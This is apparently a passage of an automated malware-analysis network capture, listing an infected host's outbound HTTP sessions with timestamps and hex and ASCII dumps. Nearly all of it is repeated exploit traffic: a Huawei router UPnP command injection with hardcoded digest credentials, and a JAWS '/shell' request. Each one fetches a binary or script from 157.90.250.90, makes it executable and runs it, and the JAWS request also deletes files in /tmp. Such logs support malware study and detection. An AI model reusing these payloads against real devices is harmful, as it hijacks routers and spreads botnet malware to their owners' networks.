                                                          Jan 2, 2024 06:24:42.634757996 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:31.779814005 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          53192.168.2.234582620.47.19.11480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:56.133253098 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:56.376698017 CET502INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:23:55 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          54192.168.2.2345120109.168.109.22980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:56.151963949 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:56.414397001 CET502INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:23:56 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          55192.168.2.2340630156.235.97.23037215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:56.194246054 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:23:57.073141098 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:23:58.065002918 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:00.048727989 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:04.240164042 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
